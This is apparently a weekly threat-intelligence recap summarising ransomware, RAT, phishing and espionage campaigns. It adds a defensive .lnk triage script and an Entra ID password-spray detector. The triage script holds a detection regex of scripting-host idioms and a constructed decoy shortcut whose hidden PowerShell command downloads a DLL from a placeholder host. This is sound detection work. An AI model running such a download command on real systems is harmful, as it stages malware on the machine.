This weekly recap covers global ransomware trends, including notable incidents involving the Fog and Spectra families and exploitation of vulnerabilities such as CVE-2024-57727 in SimpleHelp RMM. It highlights ongoing activity from threat groups such as Arkana, LockBit, and MISSION2025, along with malware campaigns such as DCRat and GrayAlpha's diverse infection vectors. #Arkana #LockBit #MISSION2025 #DCRat #GrayAlpha
Ransomware Trends & Notable Incidents
- May 2025 Ransomware Overview: Fewer new ransomware samples were observed globally, with notable activity in Korea and the financial sector and continued risk from groups such as Arkana and LockBit. May 2025 Threat Trend Report on Ransomware
- Fog Ransomware Attack: An attack on an Asian financial institution used an unusual toolset, including legitimate employee-monitoring software and open-source pentesting tools, suggesting an espionage motive rather than purely financial extortion. Fog Ransomware: Unusual Toolset Used in Recent Attack
- Spectra Ransomware Emerges: A new family derived from the Chaos ransomware builder targets Windows systems, practises double extortion, and demands a $5,000 ransom in Bitcoin. The Spectre of Spectra Ransomware
- SimpleHelp RMM Exploited for Ransomware: Ransomware actors abused CVE-2024-57727, a path traversal flaw in unpatched SimpleHelp RMM instances, to compromise utility billing software providers, prompting an urgent CISA mitigation advisory. Ransomware Actors Exploit Unpatched SimpleHelp RMM
- Play Ransomware TTPs Updated: The updated CISA advisory details Play ransomware's evolving tactics, including the custom tools Grixba and AlphaVSS used in its double-extortion campaigns. Updated Response to CISA Advisory on Play Ransomware
- Black Basta Legacy Continues: Although the group has disbanded, former members and successor groups continue phishing campaigns with Python-based payload delivery, so user vigilance remains essential. Gone But Not Forgotten: Black Basta's Enduring Legacy
Malware and RAT Campaigns
- DCRat Targets Blockchain Users: A multi-stage Trojan distributed via Telegram uses decoy LNK shortcut files and signed DLLs to evade detection. DCRat Targeting Blockchain Users
- CyberEye Telegram RAT: A modular .NET RAT uses the Telegram Bot API for command and control and supports credential theft, Windows Defender evasion, and persistence via scheduled tasks. Understanding CYBEREYE RAT Builder
- AsyncRAT & Skuld Stealer via Discord: A campaign hijacks expired Discord invite links to deliver multi-stage payloads that steal cryptocurrency wallet data. From Trust to Threat: Hijacked Discord Invites
- GrayAlpha Deploys PowerNet Loader and NetSupport RAT: The cybercriminal group uses diverse infection vectors, including custom loaders, to deliver NetSupport RAT, underscoring the need for application allow-listing and user training. GrayAlpha Uses Diverse Infection Vectors
- Winos 4.0 Backdoor in Japan: Operation Holding Hands, attributed to the China-linked APT Silver Fox, deploys the Winos 4.0 backdoor using stolen code-signing certificates and runtime decryption of its payloads. Winos 4.0 Behind Operation Holding Hands
- Sora AI Clickbait Infostealer: An infostealer masquerading as OpenAI's Sora tool exfiltrates extensive user data through GitHub and Telegram infrastructure. Sora AI Clickbait Infostealer
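Decoy LNK shortcuts such as those in the DCRat campaign above hide a scripting-host launch chain behind a document-looking icon. The triage script below is an added example, not code from the recap or from the DCRat analysis it links to: it parses the ShellLinkHeader and StringData sections of a shortcut as laid out in MS-SHLLINK and flags traits abused by decoy shortcuts (a scripting host in the target, whitespace-padded arguments, a minimised launch window). The two sample shortcuts are constructed in the script with a small builder and are not real captures, and the token list in SUSPICIOUS is an assumption rather than an indicator taken from the report.

```python
"""Triage a Windows shortcut (.lnk) by parsing its ShellLinkHeader and
StringData per MS-SHLLINK and flagging traits typical of decoy shortcuts.
Added example; not code from the recap or from the DCRat report it links to."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, on-disk byte order
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_NAMES = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
# Assumed token list: scripting hosts and download/execute idioms seen in decoy shortcuts.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc|-w(indowstyle)?\s+hidden|mshta|rundll32|regsvr32|"
    r"\bcmd(\.exe)?\s+/c|https?://|\biex\b|invoke-expression", re.I)


def _read_string(buf, pos, unicode):
    """StringData item: 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    if unicode:
        return buf[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return buf[pos:pos + count].decode("cp1252", errors="replace"), pos + count


def parse_lnk(buf):
    """Return the header fields and StringData of a shortcut as a dict."""
    if len(buf) < 76 or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", buf, 20)[0]
    show_cmd = struct.unpack_from("<I", buf, 60)[0]
    pos = 76                                   # fixed-size header ends here
    if flags & HAS_ID_LIST:                    # skip LinkTargetIDList (size prefix excludes itself)
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]
    if flags & HAS_LINK_INFO:                  # skip LinkInfo (size prefix includes itself)
        pos += struct.unpack_from("<I", buf, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"show_command": SW_NAMES.get(show_cmd, hex(show_cmd))}
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if flags & bit:                        # StringData items appear in this fixed order
            info[name], pos = _read_string(buf, pos, unicode)
    return info


def triage_lnk(buf):
    """Parse a shortcut and return (fields, findings); an empty findings list means nothing odd."""
    info = parse_lnk(buf)
    findings = []
    args = info.get("arguments", "")
    launch = (info.get("relative_path", "") + " " + args).strip()
    if SUSPICIOUS.search(launch):
        findings.append("suspicious launch command: " + re.sub(r"\s+", " ", launch)[:120])
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("launches minimised (SW_SHOWMINNOACTIVE) to hide the console window")
    if re.search(r"\s{20,}", args):
        findings.append("whitespace padding pushes the real command out of the Properties dialog")
    return info, findings


def build_lnk(relative_path, arguments, show_cmd=1):
    """Constructed sample builder (test data only): header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20)
              + b"\x00" * 24                         # creation/access/write FILETIMEs
              + struct.pack("<III", 0, 0, show_cmd)  # FileSize, IconIndex, ShowCommand
              + b"\x00" * 12)                        # HotKey + Reserved1..3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed samples, not real captures.
DECOY_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    " " * 40 + r'-w hidden -nop -c "iwr http://example.invalid/x.dll -OutFile $env:TEMP\x.dll"',
    show_cmd=7)
BENIGN_LNK = build_lnk(r"..\Program Files\App\app.exe", "--profile default")

if __name__ == "__main__":
    for label, sample in (("decoy", DECOY_LNK), ("benign", BENIGN_LNK)):
        fields, findings = triage_lnk(sample)
        print(label, fields["show_command"], findings or "no findings")
```

Run it against a real shortcut with `triage_lnk(open(path, "rb").read())`. The parser deliberately skips LinkTargetIDList and LinkInfo rather than decoding them, because for triage the launch string and ShowCommand carry most of the signal; a shortcut that hides its target solely in the IDList will show no relative_path here, which is itself worth a second look.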
Phishing, Social Engineering, and Supply Chain Threats
- PagoPA-themed Phishing Surge in Italy: CERT-AGID detected 45 campaigns that use conditional redirects to serve fraudulent payment pages only to mobile users. Increase in PagoPA Phishing Campaigns
- SharePoint Phishing Exploits Trusted Links: A multi-step phishing chain abuses legitimate SharePoint and other Microsoft-hosted links to slip past link-reputation checks and harvest credentials. SharePoint Phishing Exploits Trusted Links
- Adversary-in-the-Middle Phishing Gaining Ground: Phishing-as-a-service kits proxy Microsoft 365 and Google logins in real time to hijack sessions and defeat MFA, feeding fraud and BEC attacks. Global Analysis of AitM Phishing Threats
- TeamFiltration Account Takeover Campaign: A large-scale campaign password-sprays Microsoft Entra ID accounts from AWS infrastructure using the open-source TeamFiltration pentesting framework. Attackers Unleash TeamFiltration Campaign
- BlackSuit Social Engineering Evolves: Following Black Basta's dissolution, affiliates continue social-engineering attacks, deploying a Java-based RAT and QEMU-based malware that connects to cloud-hosted C2 servers. BlackSuit Continues Social Engineering Attacks
- Supply Chain Risks & Rogue Raspberry Pi: ClickFix social engineering tricks users into pasting and running malicious PowerShell commands themselves, a technique now used by APT28 and MuddyWater. Proactive OT Security: Supply Chain Risks
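At the log level, the TeamFiltration campaign above is a classic password spray: many accounts, few attempts each, from a shared source. The script below is an added example, not code from the recap or from the research it links to. It runs a sliding-window detection over exported Entra ID sign-in events (JSON lines using the schema's createdDateTime, userPrincipalName, ipAddress and status.errorCode fields) and reports source IPs that fail against many distinct users with few attempts per user, together with any account for which the same IP then received a valid-credential response. The sample events are constructed inline with RFC 5737 addresses; the thresholds and the error-code sets are assumptions to tune for your tenant.

```python
"""Password-spray detection over Entra ID sign-in events (JSON lines).
Added example; not code from the recap or the TeamFiltration research it links to.
Field names follow the Entra ID signIn log schema; thresholds are assumptions."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Entra error codes (assumed subset): 50126 wrong password, 50053 smart-lockout;
# 50074/50076 mean the password was right and MFA is now required; 0 is success.
FAIL_CODES = {50126, 50053}
VALID_CODES = {0, 50074, 50076}
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def detect_spray(lines, window=timedelta(minutes=30), min_users=10, max_per_user=3):
    """Return one alert per source IP whose failures within any `window` span at least
    `min_users` distinct accounts with at most `max_per_user` attempts each."""
    events = sorted((json.loads(line) for line in lines if line.strip()),
                    key=lambda e: e["createdDateTime"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ipAddress"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        best, start = None, 0
        for end in range(len(evs)):                 # sliding window over this IP's events
            t_end = datetime.strptime(evs[end]["createdDateTime"], TS_FMT)
            while t_end - datetime.strptime(evs[start]["createdDateTime"], TS_FMT) > window:
                start += 1
            fails, valid = defaultdict(int), set()
            for e in evs[start:end + 1]:
                code = e["status"]["errorCode"]
                if code in FAIL_CODES:
                    fails[e["userPrincipalName"]] += 1
                elif code in VALID_CODES:
                    valid.add(e["userPrincipalName"])
            if len(fails) >= min_users and max(fails.values()) <= max_per_user:
                cand = {"ipAddress": ip, "distinct_users": len(fails),
                        "attempts": sum(fails.values()),
                        "window_start": evs[start]["createdDateTime"],
                        "window_end": evs[end]["createdDateTime"],
                        "valid_credentials": sorted(valid)}   # accounts the sprayer got right
                # keep the widest window; ties go to the one that also caught a valid-credential hit
                if best is None or (cand["distinct_users"], len(valid)) >= (
                        best["distinct_users"], len(best["valid_credentials"])):
                    best = cand
        if best:
            alerts.append(best)
    return alerts


def _event(ts, upn, ip, code):
    return json.dumps({"createdDateTime": ts.strftime(TS_FMT), "userPrincipalName": upn,
                       "ipAddress": ip, "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                       "status": {"errorCode": code}})


def constructed_logs():
    """Constructed sample: one spraying source and one clumsy but benign user (RFC 5737 addresses)."""
    base = datetime(2025, 6, 10, 3, 0, 0)
    rows = [_event(base + timedelta(seconds=40 * i), f"user{i:02d}@contoso.example",
                   "203.0.113.7", 50126) for i in range(12)]
    # the sprayer hits a correct password on a 13th account and is stopped only by MFA
    rows.append(_event(base + timedelta(seconds=480), "user12@contoso.example", "203.0.113.7", 50076))
    for i, code in enumerate((50126, 50126, 0)):   # alice mistypes twice, then signs in
        rows.append(_event(base + timedelta(minutes=5 + i), "alice@contoso.example",
                           "198.51.100.4", code))
    return rows


if __name__ == "__main__":
    for alert in detect_spray(constructed_logs()):
        print(json.dumps(alert, indent=2))
```

The valid_credentials field is the part worth paging someone for: a spray that produced an MFA prompt means the password is known to the attacker even though the sign-in was blocked. Sprayers rotate source IPs, so in production run the same grouping on a second key (user agent, or the ASN field the sign-in log exposes) and not only on ipAddress.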
APT and Cyber Espionage Activity
- Transparent Tribe Deploys DISGOMOJI on Linux: APT-C-56 (Transparent Tribe) deploys the Go-based DISGOMOJI malware on Linux, using Google services for C2, against Indian government and military personnel. Transparent Tribe DISGOMOJI Targeting Linux
- Stealth Falcon's Zero-Day Campaign: A spear-phishing campaign against Middle Eastern targets exploits CVE-2025-33053, a WebDAV remote code execution zero-day, to deliver custom implants including the Horus Agent. CVE-2025-33053, Stealth Falcon and Horus
- MISSION2025 (APT41) Active Globally: The Chinese state-sponsored actor conducts both espionage and financially motivated intrusions, using cloud-based C2 and exploiting vulnerabilities in systems used by governments and critical infrastructure. APT PROFILE – MISSION2025
- China-Nexus Threat Actors Target Top-tier Organizations: SentinelLabs documents repeated reconnaissance and intrusion attempts against cybersecurity vendors, linked to the PurpleHaze and ShadowPad activity clusters. Follow the Smoke: China-nexus Threat Actors
Malicious Infrastructure & Tooling Highlights
- Nytheon AI – Uncensored LLM Platform: A Tor-hosted, uncensored LLM platform, likely run by Russian-speaking actors, supports spear-phishing content generation and API-driven attacks. Cato CTRL Threat Research: Nytheon AI
- JSFireTruck JavaScript Obfuscation Campaign: Large-scale injection of JavaScript obfuscated with a JSFuck-style character set into legitimate sites redirects visitors to malware and unwanted content. JSFireTruck: Malicious JavaScript Obfuscation
- BrowserVenom Exploits DeepSeek Popularity: Distributed through DeepSeek-themed phishing and malvertising, the malware configures browsers to route traffic through an attacker-controlled proxy, enabling theft and manipulation of browsing data. Toxic Trend: Malware Targeting DeepSeek
- Skeleton Spider Employs Trusted Cloud Delivery: FIN6 poses as job seekers on recruiting platforms and hosts lures on trusted cloud services behind CAPTCHA gates to deliver the More_eggs backdoor, a precursor to credential theft and ransomware. Skeleton Spider's Trusted Cloud Malware Delivery
- DanaBleed Memory Leak Revealed: A memory-leak bug in DanaBot's C2 server exposed server-side data to researchers until the platform was taken down during Operation Endgame. DanaBleed: DanaBot C2 Server Memory Leak Bug
- Predator Spyware Resurgence: Despite sanctions, Predator spyware operations have expanded into new regions with refreshed infrastructure tied to the Intellexa Consortium. Predator Still Active with New Links
Security Enhancements & Research Developments
- Elastic Call Stack for Malware Detection: Enriching Windows call stacks with module and symbol context lets detections tell legitimate callers from malware, improving detection and hunting accuracy. Call Stacks: No More Free Passes For Malware
- MITRE ATT&CK Update: Seven threat groups were added to MITRE ATT&CK in 2025, with expanded indicators that support detection through DNS and email analysis. New MITRE ATT&CK Groups for 2025
- Trend Vision One Threat Intelligence: Container-aware retrospective scanning and automated investigation speed up response to emerging threats in complex environments. Stay Ahead of Cyber Threats Sweeping Container Telemetry
- Silent Push SOAR Integrations: Automated enrichment of threat indicators and orchestration across multiple SOAR platforms reduces manual triage and strengthens proactive defenses. Enhance Cybersecurity Workflows with Silent Push SOAR
- Operationalizing Threat Intelligence vs. Threat Hunting: Framework and strategy overview for integrating intelligence and hunting to detect sophisticated threats faster. Operationalizing Threat Intelligence vs. Threat Hunting
Vulnerabilities & Exploits Affecting Critical Systems
- Microsoft Defender for Identity Spoofing (CVE-2025-26685): An unauthenticated attacker on the network can coerce the MDI sensor's Directory Service Account into authenticating to a host they control and capture its Net-NTLM hash, which can then be cracked or relayed to escalate privileges in Active Directory. Spoofing to Elevate Privileges in MDI
- Ongoing High-Severity Exploits Found: Cyble's weekly report tracks multiple actively exploited vulnerabilities across ICS, enterprise, and web systems, including exploitation by China-linked APTs. The Week in Vulnerabilities: Cyble Report
Emerging Threats in Browser Extensions & Cloud Platforms
- Malicious Browser Extensions Rising: Malicious extensions exploit the trust placed in official stores to hijack sessions, manipulate traffic, and steal credentials; one Chrome extension reportedly sold for $100k drains cryptocurrency wallets. Growing Risk of Malicious Browser Extensions
- VexTrio Adtech Cabal: Alliances between malware actors, including WordPress site hackers, and adtech companies funnel traffic from compromised sites into push-notification scams at scale. Vexing & Vicious: WordPress Hackers & Adtech
Threat Research | Weekly Recap – hendryadrian.com